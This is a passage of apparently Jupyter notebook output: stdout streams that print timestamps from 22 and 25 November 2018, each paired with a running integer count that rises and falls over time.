"['2018-11-22 15:09:07.530946', 11]\n",
"['2018-11-22 15:09:11.284579', 12]\n",
"['2018-11-22 15:09:15.265250', 11]\n",
"['2018-11-22 15:09:21.179728', 10]\n",
"['2018-11-22 15:11:02.192741', 9]\n",
"['2018-11-22 15:11:26.478318', 10]\n",
"['2018-11-22 15:11:59.974506', 8]\n",
"['2018-11-22 15:12:30.615300', 7]\n",
"['2018-11-22 15:15:31.463678', 6]\n",
"['2018-11-22 15:16:06.444211', 7]\n",
"['2018-11-22 15:16:49.267053', 6]\n",
"['2018-11-22 15:18:11.300050', 5]\n",
"['2018-11-22 15:19:03.732974', 6]\n",
"['2018-11-22 15:19:34.278400', 5]\n",
"['2018-11-22 15:21:14.291026', 4]\n",
"['2018-11-22 15:36:44.530272', 1]\n",
"['2018-11-22 15:36:49.002086', 2]\n",
"['2018-11-22 15:43:47.635129', 3]\n",
"['2018-11-22 15:45:34.212798', 4]\n",
"['2018-11-22 15:48:04.058107', 3]\n",
"['2018-11-22 15:49:06.962968', 4]\n",
"['2018-11-22 15:50:08.560650', 3]\n",
"['2018-11-22 15:50:15.068227', 4]\n",
"['2018-11-22 15:50:34.231014', 5]\n",
"['2018-11-22 15:51:33.504994', 6]\n",
"['2018-11-22 15:53:09.593128', 5]\n",
"['2018-11-22 15:53:50.623718', 6]\n",
"['2018-11-22 15:53:50.753090', 7]\n",
"['2018-11-22 15:53:54.137353', 8]\n",
"['2018-11-22 15:55:07.887858', 9]\n",
"['2018-11-22 15:56:02.506900', 10]\n",
"['2018-11-22 15:56:25.760780', 11]\n",
"['2018-11-22 15:57:00.536404', 12]\n",
"['2018-11-22 15:57:07.289687', 11]\n",
"['2018-11-22 15:58:09.589883', 10]\n",
"['2018-11-22 15:58:33.744166', 8]\n",
"['2018-11-22 15:59:36.650107', 7]\n",
"['2018-11-22 16:01:01.228618', 6]\n",
"['2018-11-22 16:01:33.334595', 4]\n",
"['2018-11-22 16:02:58.057050', 5]\n",
"['2018-11-22 16:03:00.616058', 6]\n",
"['2018-11-22 16:03:07.221733', 7]\n",
"['2018-11-22 16:03:26.551241', 6]\n",
"['2018-11-22 16:03:30.877979', 7]\n",
"['2018-11-22 16:03:38.144725', 8]\n",
"['2018-11-22 16:03:40.955119', 9]\n",
"['2018-11-22 16:03:59.815034', 10]\n",
"['2018-11-22 16:04:25.671601', 9]\n",
"['2018-11-22 16:05:01.267243', 8]\n",
"['2018-11-22 16:06:18.370186', 9]\n",
"['2018-11-22 16:06:58.362547', 8]\n",
"['2018-11-22 16:07:32.886745', 7]\n",
"['2018-11-22 16:08:06.645031', 5]\n",
"['2018-11-22 16:08:38.101056', 4]\n",
"['2018-11-22 16:12:44.130563', 5]\n",
"['2018-11-22 16:13:11.617854', 6]\n",
"['2018-11-22 16:17:00.805116', 5]\n",
"['2018-11-22 16:18:26.794795', 3]\n",
"['2018-11-22 16:19:21.184983', 4]\n",
"['2018-11-22 16:20:17.468125', 5]\n",
"['2018-11-22 16:20:24.350528', 6]\n",
"['2018-11-22 16:20:32.563718', 7]\n",
"['2018-11-22 16:20:37.529576', 8]\n",
"['2018-11-22 16:22:09.547059', 9]\n",
"['2018-11-22 16:22:11.112770', 10]\n",
"['2018-11-22 16:25:36.953020', 8]\n",
"['2018-11-22 16:39:36.545667', 1]\n",
"['2018-11-22 16:48:39.801475', 2]\n",
"['2018-11-22 16:54:33.007480', 1]\n",
"['2018-11-22 16:58:03.356275', 2]\n",
"['2018-11-22 16:58:43.321561', 3]\n",
"['2018-11-22 16:58:47.839429', 4]\n",
"['2018-11-22 16:59:22.924916', 5]\n",
"['2018-11-22 17:00:00.679985', 6]\n",
"['2018-11-22 17:00:55.913896', 7]\n",
"['2018-11-22 17:01:04.132468', 8]\n",
"['2018-11-22 17:01:54.158030', 9]\n",
"['2018-11-22 17:02:56.780906', 7]\n",
"['2018-11-22 17:06:06.266128', 6]\n",
"['2018-11-22 17:06:21.449005', 7]\n",
"['2018-11-22 17:06:56.297944', 8]\n",
"['2018-11-22 17:07:09.227634', 9]\n",
"['2018-11-22 17:07:42.380965', 10]\n",
"['2018-11-22 17:07:59.836618', 9]\n",
"['2018-11-22 17:08:03.255082', 10]\n",
"['2018-11-22 17:10:35.685285', 9]\n",
"['2018-11-22 17:12:13.810732', 3]\n",
"['2018-11-22 17:13:38.336977', 4]\n",
"['2018-11-22 17:14:16.869723', 5]\n",
"['2018-11-22 17:17:10.482941', 4]\n",
"['2018-11-22 17:18:30.783338', 5]\n",
"['2018-11-22 17:18:42.952324', 6]\n",
"['2018-11-22 17:21:29.359556', 4]\n",
"['2018-11-22 17:23:09.725226', 2]\n",
"['2018-11-22 17:28:05.240866', 1]\n",
"['2018-11-22 17:39:29.357223', 2]\n",
"['2018-11-22 17:41:42.558972', 3]\n",
"['2018-11-22 17:43:37.947521', 4]\n",
"['2018-11-22 17:45:08.307989', 5]\n",
"['2018-11-22 17:46:03.776884', 6]\n",
"['2018-11-22 17:47:48.826005', 7]\n",
"['2018-11-22 17:48:45.380272', 6]\n",
"['2018-11-22 17:49:45.789272', 7]\n",
"['2018-11-22 17:51:00.314163', 8]\n",
"['2018-11-22 17:52:00.392452', 7]\n",
"['2018-11-22 17:53:32.927277', 8]\n",
"['2018-11-22 17:53:40.494815', 7]\n",
"['2018-11-22 17:53:59.827308', 8]\n",
"['2018-11-22 17:54:03.485699', 9]\n",
"['2018-11-22 17:54:25.892919', 8]\n",
"['2018-11-22 17:55:32.036627', 9]\n",
"['2018-11-22 17:55:46.443583', 8]\n",
"['2018-11-22 17:58:23.651140', 7]\n",
"['2018-11-22 17:58:48.795630', 8]\n",
"['2018-11-22 17:58:49.645343', 9]\n",
"['2018-11-22 17:59:19.274300', 10]\n",
"['2018-11-22 17:59:29.745735', 11]\n",
"['2018-11-22 18:00:49.511656', 10]\n",
"['2018-11-22 18:00:56.171303', 11]\n",
"['2018-11-22 18:01:03.569386', 12]\n",
"['2018-11-22 18:01:10.471330', 13]\n",
"['2018-11-22 18:01:37.634341', 14]\n",
"['2018-11-22 18:02:48.665107', 13]\n",
"['2018-11-22 18:02:52.397337', 12]\n",
"['2018-11-22 18:03:08.520782', 11]\n",
"['2018-11-22 18:04:02.045063', 10]\n",
"['2018-11-22 18:04:17.107832', 11]\n",
"['2018-11-22 18:04:49.506236', 12]\n",
"['2018-11-22 18:05:13.737443', 11]\n",
"['2018-11-22 18:06:04.104827', 8]\n",
"['2018-11-22 18:06:12.080019', 7]\n",
"['2018-11-22 18:08:00.267892', 8]\n",
"['2018-11-22 18:08:34.748976', 9]\n",
"['2018-11-22 18:09:41.366830', 8]\n",
"['2018-11-22 18:09:58.479123', 9]\n",
"['2018-11-22 18:10:58.495075', 8]\n",
"['2018-11-22 18:12:37.643226', 3]\n",
"['2018-11-22 18:13:33.605536', 4]\n",
"['2018-11-22 18:17:02.650381', 3]\n",
"['2018-11-22 18:21:51.668544', 1]\n",
"['2018-11-22 18:26:36.931175', 2]\n",
"['2018-11-22 18:39:54.134230', 1]\n",
"['2018-11-22 18:43:04.769099', 2]\n",
"['2018-11-22 18:50:57.265593', 1]\n",
"['2018-11-22 18:52:04.894740', 2]\n",
"['2018-11-22 18:53:03.934821', 3]\n",
"['2018-11-22 18:55:04.043878', 2]\n",
"['2018-11-22 19:01:03.217272', 1]\n",
"['2018-11-22 19:01:32.045727', 2]\n",
"['2018-11-22 19:03:35.273474', 3]\n",
"['2018-11-22 19:04:32.308037', 4]\n",
"['2018-11-22 19:04:43.437441', 5]\n",
"['2018-11-22 19:07:56.159656', 4]\n",
"['2018-11-22 19:08:28.148791', 3]\n",
"['2018-11-22 19:10:17.581551', 4]\n",
"['2018-11-22 19:10:20.815614', 5]\n",
"['2018-11-22 19:10:35.622879', 6]\n",
"['2018-11-22 19:11:51.194968', 7]\n",
"['2018-11-22 19:12:04.100417', 8]\n",
"['2018-11-22 19:12:19.349843', 9]\n",
"['2018-11-22 19:14:20.379838', 10]\n",
"['2018-11-22 19:14:24.271864', 11]\n",
"['2018-11-22 19:15:07.976014', 10]\n",
"['2018-11-22 19:15:15.056950', 11]\n",
"['2018-11-22 19:15:23.102067', 10]\n",
"['2018-11-22 19:15:47.879392', 11]\n",
"['2018-11-22 19:16:07.478103', 10]\n",
"['2018-11-22 19:16:13.152799', 9]\n",
"['2018-11-22 19:18:44.487070', 7]\n",
"['2018-11-22 19:18:54.260740', 6]\n",
"['2018-11-22 19:19:37.575665', 7]\n",
"['2018-11-22 19:21:54.035099', 8]\n",
"['2018-11-22 19:22:59.770351', 7]\n",
"['2018-11-22 19:23:33.762433', 6]\n",
"['2018-11-22 19:24:32.986735', 5]\n",
"['2018-11-22 19:26:23.757861', 3]\n",
"['2018-11-22 19:49:41.226910', 1]\n",
"['2018-11-22 19:50:01.268934', 2]\n",
"['2018-11-22 19:50:53.985484', 3]\n",
"['2018-11-22 19:53:54.027647', 2]\n",
"['2018-11-22 19:55:28.149216', 3]\n",
"['2018-11-22 19:55:46.466462', 4]\n",
"['2018-11-22 19:56:02.318793', 5]\n",
"['2018-11-22 19:58:03.340405', 4]\n",
"['2018-11-22 20:05:17.113251', 5]\n",
"['2018-11-22 20:06:05.239102', 4]\n",
"['2018-11-22 20:07:58.421590', 5]\n",
"['2018-11-22 20:09:07.054019', 6]\n",
"['2018-11-22 20:09:18.727101', 5]\n",
"['2018-11-22 20:09:21.811786', 6]\n",
"['2018-11-22 20:09:37.390395', 7]\n",
"['2018-11-22 20:09:50.994495', 6]\n",
"['2018-11-22 20:10:05.084964', 7]\n",
"['2018-11-22 20:11:21.584595', 8]\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-22 20:13:00.425772', 9]\n",
"['2018-11-22 20:13:52.116924', 8]\n",
"['2018-11-22 20:14:22.435206', 7]\n",
"['2018-11-22 20:16:15.295371', 6]\n",
"['2018-11-22 20:17:23.984622', 5]\n",
"['2018-11-22 20:18:28.212449', 4]\n",
"['2018-11-22 20:19:13.119820', 5]\n",
"['2018-11-22 20:20:45.290465', 4]\n",
"['2018-11-22 20:22:52.278177', 3]\n",
"['2018-11-22 20:26:51.725141', 4]\n",
"['2018-11-22 20:27:30.456936', 3]\n",
"['2018-11-22 20:27:34.862284', 4]\n",
"['2018-11-22 20:32:47.979118', 5]\n",
"['2018-11-22 20:33:50.578589', 4]\n",
"['2018-11-22 20:38:04.820707', 1]\n",
"['2018-11-22 20:45:48.731063', 2]\n",
"['2018-11-22 20:47:22.739768', 3]\n",
"['2018-11-22 20:51:40.739600', 4]\n",
"['2018-11-22 20:52:40.755568', 3]\n",
"['2018-11-22 20:57:14.728286', 4]\n",
"['2018-11-22 20:57:15.845270', 5]\n",
"['2018-11-22 20:58:04.167585', 6]\n",
"['2018-11-22 20:58:23.539696', 7]\n",
"['2018-11-22 21:00:30.415355', 6]\n",
"['2018-11-22 21:00:52.632447', 7]\n",
"['2018-11-25 05:11:44.815401', 1]\n",
"['2018-11-25 05:28:56.855213', 2]\n",
"['2018-11-25 06:14:54.013778', 1]\n",
"['2018-11-25 06:37:58.031474', 2]\n",
"['2018-11-25 06:43:17.891556', 1]\n",
"['2018-11-25 06:55:49.428055', 2]\n",
"['2018-11-25 06:56:26.497993', 3]\n",
"['2018-11-25 07:00:00.621544', 2]\n",
"['2018-11-25 07:00:06.410847', 3]\n",
"['2018-11-25 07:01:33.301785', 4]\n",
"['2018-11-25 07:03:08.000826', 5]\n",
"['2018-11-25 07:03:10.032806', 6]\n",
"['2018-11-25 07:03:17.426077', 7]\n",
"['2018-11-25 07:03:41.345195', 8]\n",
"['2018-11-25 07:05:04.994113', 7]\n",
"['2018-11-25 07:05:47.277192', 6]\n",
"['2018-11-25 07:06:27.034563', 7]\n",
"['2018-11-25 07:07:37.629414', 6]\n",
"['2018-11-25 07:10:06.313016', 3]\n",
"['2018-11-25 07:10:53.003088', 2]\n",
"['2018-11-25 07:11:15.092422', 3]\n",
"['2018-11-25 07:15:25.281496', 2]\n",
"['2018-11-25 07:19:06.067103', 1]\n",
"['2018-11-25 07:21:56.269691', 2]\n",
"['2018-11-25 07:22:02.966089', 3]\n",
"['2018-11-25 07:22:26.998178', 4]\n",
"['2018-11-25 07:23:06.620259', 3]\n",
"['2018-11-25 07:33:02.755690', 1]\n",
"['2018-11-25 07:36:59.150406', 2]\n",
"['2018-11-25 07:37:00.885503', 3]\n",
"['2018-11-25 07:37:39.290070', 4]\n",
"['2018-11-25 07:37:59.592295', 5]\n",
"['2018-11-25 07:42:00.796368', 4]\n",
"['2018-11-25 07:45:06.971049', 3]\n",
"['2018-11-25 07:45:52.470247', 4]\n",
"['2018-11-25 07:46:05.445053', 5]\n",
"['2018-11-25 07:46:33.366903', 4]\n",
"['2018-11-25 07:46:54.525708', 5]\n",
"['2018-11-25 07:49:55.229297', 4]\n",
"['2018-11-25 07:50:41.449042', 5]\n",
"['2018-11-25 07:50:57.609307', 6]\n",
"['2018-11-25 07:51:20.354465', 5]\n",
"['2018-11-25 07:51:26.494055', 4]\n",
"['2018-11-25 07:52:57.347196', 5]\n",
"['2018-11-25 07:56:47.963756', 6]\n",
"['2018-11-25 07:56:54.796640', 5]\n",
"['2018-11-25 07:57:05.277805', 4]\n",
"['2018-11-25 07:59:32.852075', 3]\n",
"['2018-11-25 08:03:02.968397', 2]\n",
"['2018-11-25 08:08:50.014129', 1]\n",
"['2018-11-25 08:34:32.898486', 2]\n",
"['2018-11-25 08:35:00.341150', 3]\n",
"['2018-11-25 08:39:12.884648', 2]\n",
"['2018-11-25 08:39:22.718266', 3]\n",
"['2018-11-25 08:40:16.706398', 4]\n",
"['2018-11-25 08:41:37.169125', 5]\n",
"['2018-11-25 08:42:43.546378', 6]\n",
"['2018-11-25 08:45:00.043837', 7]\n",
"['2018-11-25 08:45:02.188619', 8]\n",
"['2018-11-25 08:45:30.905380', 9]\n",
"['2018-11-25 08:45:44.944599', 8]\n",
"['2018-11-25 08:46:17.439059', 9]\n",
"['2018-11-25 08:46:31.031381', 8]\n",
"['2018-11-25 08:46:49.390339', 7]\n",
"['2018-11-25 08:48:48.664279', 8]\n",
"['2018-11-25 08:49:21.791084', 6]\n",
"['2018-11-25 08:50:18.511689', 5]\n",
"['2018-11-25 08:51:39.195132', 6]\n",
"['2018-11-25 08:52:18.992592', 7]\n",
"['2018-11-25 08:52:55.577198', 8]\n",
"['2018-11-25 08:52:56.269704', 9]\n",
"['2018-11-25 08:53:22.943923', 8]\n",
"['2018-11-25 08:54:26.409531', 9]\n",
"['2018-11-25 08:56:46.645376', 6]\n",
"['2018-11-25 08:57:49.366362', 4]\n",
"['2018-11-25 08:58:50.387928', 3]\n",
"['2018-11-25 08:59:52.348557', 2]\n",
"['2018-11-25 09:18:26.382250', 1]\n",
"['2018-11-25 09:20:41.769228', 2]\n",
"['2018-11-25 09:21:22.280338', 3]\n",
"['2018-11-25 09:26:41.374416', 1]\n",
"['2018-11-25 09:28:17.447747', 2]\n",
"['2018-11-25 09:30:01.918288', 3]\n",
"['2018-11-25 09:30:06.672338', 4]\n",
"['2018-11-25 09:34:44.042021', 2]\n",
"['2018-11-25 09:34:45.493592', 3]\n",
"['2018-11-25 09:34:51.375403', 4]\n",
"['2018-11-25 09:34:56.133487', 5]\n",
"['2018-11-25 09:35:05.045445', 6]\n",
"['2018-11-25 09:37:14.327578', 5]\n",
"['2018-11-25 09:39:07.369075', 4]\n",
"['2018-11-25 09:45:05.391967', 5]\n",
"['2018-11-25 09:50:01.742970', 4]\n",
"['2018-11-25 09:50:03.039910', 5]\n",
"['2018-11-25 09:58:07.765643', 4]\n",
"['2018-11-25 09:59:25.704475', 5]\n",
"['2018-11-25 10:00:48.289289', 6]\n",
"['2018-11-25 10:07:35.874511', 7]\n",
"['2018-11-25 10:13:57.663392', 8]\n",
"['2018-11-25 10:14:27.226927', 7]\n",
"['2018-11-25 10:17:32.731868', 6]\n",
"['2018-11-25 10:18:07.858477', 5]\n",
"['2018-11-25 10:20:07.984000', 4]\n",
"['2018-11-25 10:20:33.123135', 2]\n",
"['2018-11-25 10:21:41.908722', 3]\n",
"['2018-11-25 10:27:32.569106', 4]\n",
"['2018-11-25 10:30:42.396791', 5]\n",
"['2018-11-25 10:32:15.956130', 3]\n",
"['2018-11-25 10:36:00.941760', 2]\n",
"['2018-11-25 10:36:53.388850', 3]\n",
"['2018-11-25 10:41:35.316521', 4]\n",
"['2018-11-25 10:41:45.448522', 5]\n",
"['2018-11-25 10:42:02.101159', 6]\n",
"['2018-11-25 10:42:52.712283', 7]\n",
"['2018-11-25 10:43:07.964115', 6]\n",
"['2018-11-25 10:43:44.506053', 7]\n",
"['2018-11-25 10:44:28.439036', 8]\n",
"['2018-11-25 10:47:07.011542', 7]\n",
"['2018-11-25 10:48:11.164602', 8]\n",
"['2018-11-25 10:48:14.728267', 9]\n",
"['2018-11-25 10:48:26.034101', 10]\n",
"['2018-11-25 10:49:03.445785', 11]\n",
"['2018-11-25 10:49:27.450552', 12]\n",
"['2018-11-25 10:49:29.067791', 13]\n",
"['2018-11-25 10:49:58.234394', 12]\n",
"['2018-11-25 10:51:01.945072', 13]\n",
"['2018-11-25 10:51:09.827361', 14]\n",
"['2018-11-25 10:51:33.389472', 13]\n",
"['2018-11-25 10:51:57.833638', 14]\n",
"['2018-11-25 10:52:15.651953', 15]\n",
"['2018-11-25 10:52:23.485087', 14]\n",
"['2018-11-25 10:52:26.699937', 13]\n",
"['2018-11-25 10:52:42.621814', 14]\n",
"['2018-11-25 10:53:18.459457', 15]\n",
"['2018-11-25 10:53:28.183299', 16]\n",
"['2018-11-25 10:53:28.993116', 17]\n",
"['2018-11-25 10:54:00.792961', 16]\n",
"['2018-11-25 10:54:21.304610', 15]\n",
"['2018-11-25 10:54:44.818868', 16]\n",
"['2018-11-25 10:55:14.890939', 14]\n",
"['2018-11-25 10:55:23.679103', 15]\n",
"['2018-11-25 10:55:42.319511', 14]\n",
"['2018-11-25 10:57:00.933844', 13]\n",
"['2018-11-25 10:57:18.473992', 11]\n",
"['2018-11-25 10:57:43.484905', 9]\n",
"['2018-11-25 10:58:07.632907', 8]\n",
"['2018-11-25 10:58:19.008244', 9]\n",
"['2018-11-25 10:58:59.242465', 10]\n",
"['2018-11-25 10:59:23.090578', 11]\n",
"['2018-11-25 10:59:25.347272', 12]\n",
"['2018-11-25 10:59:45.626499', 13]\n",
"['2018-11-25 11:00:05.792077', 12]\n",
"['2018-11-25 11:00:17.446170', 13]\n",
"['2018-11-25 11:02:30.702371', 12]\n",
"['2018-11-25 11:02:30.815452', 13]\n",
"['2018-11-25 11:02:51.712587', 12]\n",
"['2018-11-25 11:03:01.150327', 13]\n",
"['2018-11-25 11:03:11.656166', 14]\n",
"['2018-11-25 11:03:31.186069', 12]\n",
"['2018-11-25 11:04:00.025232', 11]\n",
"['2018-11-25 11:04:49.177225', 10]\n",
"['2018-11-25 11:05:11.704649', 11]\n",
"['2018-11-25 11:05:13.814332', 12]\n",
"['2018-11-25 11:05:17.314552', 13]\n",
"['2018-11-25 11:05:23.437140', 12]\n",
"['2018-11-25 11:06:01.029553', 13]\n",
"['2018-11-25 11:07:32.055148', 14]\n",
"['2018-11-25 11:08:55.364150', 15]\n",
"['2018-11-25 11:09:15.080968', 14]\n",
"['2018-11-25 11:09:37.866176', 15]\n",
"['2018-11-25 11:09:59.919807', 16]\n",
"['2018-11-25 11:10:00.746232', 17]\n",
"['2018-11-25 11:10:50.353327', 16]\n",
"['2018-11-25 11:11:02.153453', 15]\n",
"['2018-11-25 11:11:39.492198', 14]\n",
"['2018-11-25 11:12:13.833293', 13]\n",
"['2018-11-25 11:12:42.578454', 14]\n",
"['2018-11-25 11:12:55.962067', 11]\n",
"['2018-11-25 11:13:07.243247', 10]\n",
"['2018-11-25 11:13:57.508680', 8]\n",
"['2018-11-25 11:14:28.476564', 5]\n",
"['2018-11-25 11:14:52.226580', 6]\n",
"['2018-11-25 11:15:01.536435', 7]\n",
"['2018-11-25 11:15:31.718793', 8]\n",
"['2018-11-25 11:16:03.909954', 9]\n",
"['2018-11-25 11:16:44.986880', 10]\n",
"['2018-11-25 11:17:42.566183', 9]\n",
"['2018-11-25 11:17:43.134954', 10]\n",
"['2018-11-25 11:19:17.451222', 9]\n",
"['2018-11-25 11:20:23.877480', 8]\n",
"['2018-11-25 11:21:23.878740', 4]\n",
"['2018-11-25 11:21:26.849103', 5]\n",
"['2018-11-25 11:21:49.580800', 3]\n",
"['2018-11-25 11:22:44.454137', 4]\n",
"['2018-11-25 11:23:23.880673', 3]\n",
"['2018-11-25 11:25:06.861738', 4]\n",
"['2018-11-25 11:25:55.949645', 5]\n",
"['2018-11-25 11:26:01.210391', 6]\n",
"['2018-11-25 11:26:23.885493', 5]\n",
"['2018-11-25 11:26:31.240201', 6]\n",
"['2018-11-25 11:27:00.684559', 7]\n",
"['2018-11-25 11:27:18.253870', 8]\n",
"['2018-11-25 11:28:29.194496', 9]\n",
"['2018-11-25 11:28:46.397829', 8]\n",
"['2018-11-25 11:29:12.916456', 7]\n",
"['2018-11-25 11:30:24.844719', 6]\n",
"['2018-11-25 11:30:58.256423', 7]\n",
"['2018-11-25 11:31:31.028457', 8]\n",
"['2018-11-25 11:32:49.082457', 9]\n",
"['2018-11-25 11:32:55.493677', 8]\n",
"['2018-11-25 11:35:28.166997', 9]\n",
"['2018-11-25 11:36:00.135889', 8]\n",
"['2018-11-25 11:38:26.081087', 9]\n",
"['2018-11-25 11:39:08.469657', 10]\n",
"['2018-11-25 11:39:31.428192', 9]\n",
"['2018-11-25 11:41:21.543172', 8]\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-25 11:43:23.410638', 6]\n",
"['2018-11-25 11:45:26.440813', 1]\n",
"['2018-11-25 12:14:24.131951', 2]\n",
"['2018-11-25 12:14:25.762629', 3]\n",
"['2018-11-25 12:15:45.918042', 4]\n",
"['2018-11-25 12:16:53.356123', 5]\n",
"['2018-11-25 12:17:00.949304', 6]\n",
"['2018-11-25 12:17:09.944511', 7]\n",
"['2018-11-25 12:17:19.103393', 8]\n",
"['2018-11-25 12:19:25.953866', 7]\n",
"['2018-11-25 12:21:11.022819', 5]\n",
"['2018-11-25 12:21:26.039693', 4]\n",
"['2018-11-25 12:21:32.694293', 5]\n",
"['2018-11-25 12:24:06.247658', 6]\n",
"['2018-11-25 12:24:17.439719', 7]\n",
"['2018-11-25 12:25:40.128973', 8]\n",
"['2018-11-25 12:28:24.920919', 7]\n",
"['2018-11-25 12:28:27.754362', 8]\n",
"['2018-11-25 12:28:31.899646', 9]\n",
"['2018-11-25 12:28:32.421224', 10]\n",
"['2018-11-25 12:28:33.395223', 11]\n",
"['2018-11-25 12:28:59.061870', 12]\n",
"['2018-11-25 12:30:06.131621', 13]\n",
"['2018-11-25 12:30:24.799248', 12]\n",
"['2018-11-25 12:31:14.173647', 11]\n",
"['2018-11-25 12:32:09.406361', 12]\n",
"['2018-11-25 12:33:09.186929', 13]\n",
"['2018-11-25 12:33:13.416636', 14]\n",
"['2018-11-25 12:33:18.414165', 15]\n",
"['2018-11-25 12:33:20.995214', 14]\n",
"['2018-11-25 12:33:39.499572', 13]\n",
"['2018-11-25 12:33:43.725309', 12]\n",
"['2018-11-25 12:33:52.963166', 11]\n",
"['2018-11-25 12:35:31.489293', 12]\n",
"['2018-11-25 12:35:51.436058', 11]\n",
"['2018-11-25 12:35:54.251671', 12]\n",
"['2018-11-25 12:36:01.060544', 13]\n",
"['2018-11-25 12:37:43.330634', 12]\n",
"['2018-11-25 12:37:50.471581', 11]\n",
"['2018-11-25 12:37:57.935499', 10]\n",
"['2018-11-25 12:41:01.068033', 5]\n",
"['2018-11-25 12:41:44.438613', 4]\n",
"['2018-11-25 12:46:14.595973', 5]\n",
"['2018-11-25 12:48:26.580181', 6]\n",
"['2018-11-25 12:49:51.754025', 7]\n",
"['2018-11-25 12:50:26.673721', 6]\n",
"['2018-11-25 12:52:15.601992', 5]\n",
"['2018-11-25 12:53:11.572659', 4]\n",
"['2018-11-25 12:54:15.142604', 3]\n",
"['2018-11-25 12:55:15.191631', 2]\n",
"['2018-11-25 12:57:55.214889', 1]\n",
"['2018-11-25 12:59:13.291185', 2]\n",
"['2018-11-25 13:01:05.447415', 3]\n",
"['2018-11-25 13:02:25.830605', 2]\n",
"['2018-11-25 13:02:26.320594', 3]\n",
"['2018-11-25 13:02:51.664763', 4]\n",
"['2018-11-25 13:03:20.029380', 3]\n",
"['2018-11-25 13:08:41.546078', 2]\n",
"['2018-11-25 13:10:42.645605', 1]\n",
"['2018-11-25 13:10:57.865892', 2]\n",
"['2018-11-25 13:12:24.613311', 3]\n",
"['2018-11-25 13:13:12.030885', 4]\n",
"['2018-11-25 13:13:17.671550', 5]\n",
"['2018-11-25 13:14:38.838703', 6]\n",
"['2018-11-25 13:14:42.173605', 7]\n",
"['2018-11-25 13:14:43.818193', 8]\n",
"['2018-11-25 13:15:21.490890', 9]\n",
"['2018-11-25 13:16:57.964952', 8]\n",
"['2018-11-25 13:17:26.464963', 7]\n",
"['2018-11-25 13:18:02.606395', 8]\n",
"['2018-11-25 13:18:31.446720', 9]\n",
"['2018-11-25 13:19:08.253139', 10]\n",
"['2018-11-25 13:19:15.262463', 9]\n",
"['2018-11-25 13:19:26.469888', 8]\n",
"['2018-11-25 13:20:11.691808', 9]\n",
"['2018-11-25 13:21:37.495923', 10]\n",
"['2018-11-25 13:21:54.915392', 11]\n",
"['2018-11-25 13:22:26.473849', 10]\n",
"['2018-11-25 13:22:38.356308', 9]\n",
"['2018-11-25 13:23:26.477395', 7]\n",
"['2018-11-25 13:23:41.297898', 8]\n",
"['2018-11-25 13:25:03.472349', 9]\n",
"['2018-11-25 13:25:14.461921', 8]\n",
"['2018-11-25 13:25:25.950413', 9]\n",
"['2018-11-25 13:25:26.021306', 10]\n",
"['2018-11-25 13:25:27.590810', 11]\n",
"['2018-11-25 13:25:36.527660', 10]\n",
"['2018-11-25 13:26:31.339764', 9]\n",
"['2018-11-25 13:27:47.077607', 8]\n",
"['2018-11-25 13:28:38.273837', 9]\n",
"['2018-11-25 13:29:01.270908', 10]\n",
"['2018-11-25 13:30:00.399856', 9]\n",
"['2018-11-25 13:30:14.446551', 10]\n",
"['2018-11-25 13:30:39.076836', 11]\n",
"['2018-11-25 13:30:59.506309', 10]\n",
"['2018-11-25 13:31:21.885751', 9]\n",
"['2018-11-25 13:32:22.781714', 10]\n",
"['2018-11-25 13:32:26.870705', 11]\n",
"['2018-11-25 13:32:34.710288', 12]\n",
"['2018-11-25 13:32:35.243333', 13]\n",
"['2018-11-25 13:32:50.092780', 12]\n",
"['2018-11-25 13:34:21.246831', 13]\n",
"['2018-11-25 13:34:35.264913', 14]\n",
"['2018-11-25 13:34:36.201106', 15]\n",
"['2018-11-25 13:34:38.494929', 14]\n",
"['2018-11-25 13:34:47.146720', 13]\n",
"['2018-11-25 13:35:03.455985', 14]\n",
"['2018-11-25 13:35:51.772801', 13]\n",
"['2018-11-25 13:36:03.521434', 12]\n",
"['2018-11-25 13:36:23.138007', 11]\n",
"['2018-11-25 13:36:58.322286', 9]\n",
"['2018-11-25 13:37:15.134244', 10]\n",
"['2018-11-25 13:37:17.591400', 11]\n",
"['2018-11-25 13:37:23.814244', 12]\n",
"['2018-11-25 13:37:31.437321', 13]\n",
"['2018-11-25 13:38:34.175101', 12]\n",
"['2018-11-25 13:38:49.598055', 9]\n",
"['2018-11-25 13:39:41.220979', 10]\n",
"['2018-11-25 13:40:49.313020', 9]\n",
"['2018-11-25 13:41:41.632826', 7]\n",
"['2018-11-25 13:41:47.735560', 6]\n",
"['2018-11-25 13:42:17.862658', 5]\n",
"['2018-11-25 13:43:23.276376', 6]\n",
"['2018-11-25 13:44:01.800405', 5]\n",
"['2018-11-25 13:44:47.993585', 6]\n",
"['2018-11-25 13:45:01.194664', 7]\n",
"['2018-11-25 13:47:30.267136', 6]\n",
"['2018-11-25 13:49:02.616716', 3]\n",
"['2018-11-25 13:53:17.093534', 1]\n",
"['2018-11-25 13:57:45.432636', 2]\n",
"['2018-11-25 13:59:45.731450', 3]\n",
"['2018-11-25 14:00:04.826566', 4]\n",
"['2018-11-25 14:00:04.830414', 5]\n",
"['2018-11-25 14:00:37.775977', 4]\n",
"['2018-11-25 14:02:16.626332', 3]\n",
"['2018-11-25 14:04:22.408934', 4]\n",
"['2018-11-25 14:04:24.823042', 5]\n",
"['2018-11-25 14:05:15.770427', 6]\n",
"['2018-11-25 14:06:25.332995', 4]\n",
"['2018-11-25 14:06:51.324657', 3]\n",
"['2018-11-25 14:07:56.948177', 4]\n",
"['2018-11-25 14:08:43.897030', 5]\n",
"['2018-11-25 14:10:56.990157', 4]\n",
"['2018-11-25 14:11:23.882071', 3]\n",
"['2018-11-25 14:13:27.981048', 2]\n",
"['2018-11-25 14:13:52.680644', 3]\n",
"['2018-11-25 14:14:14.619163', 4]\n",
"['2018-11-25 14:15:19.867859', 5]\n",
"['2018-11-25 14:18:31.933358', 4]\n",
"['2018-11-25 14:19:52.758760', 2]\n",
"['2018-11-25 14:23:49.918699', 3]\n",
"['2018-11-25 14:23:57.877589', 4]\n",
"['2018-11-25 14:24:01.821465', 5]\n",
"['2018-11-25 14:24:22.438036', 6]\n",
"['2018-11-25 14:25:12.797297', 7]\n",
"['2018-11-25 14:25:59.288335', 8]\n",
"['2018-11-25 14:27:22.701759', 9]\n",
"['2018-11-25 14:27:31.258835', 10]\n",
"['2018-11-25 14:28:01.607441', 9]\n",
"['2018-11-25 14:29:07.167684', 7]\n",
"['2018-11-25 14:29:08.802517', 8]\n",
"['2018-11-25 14:29:31.946545', 9]\n",
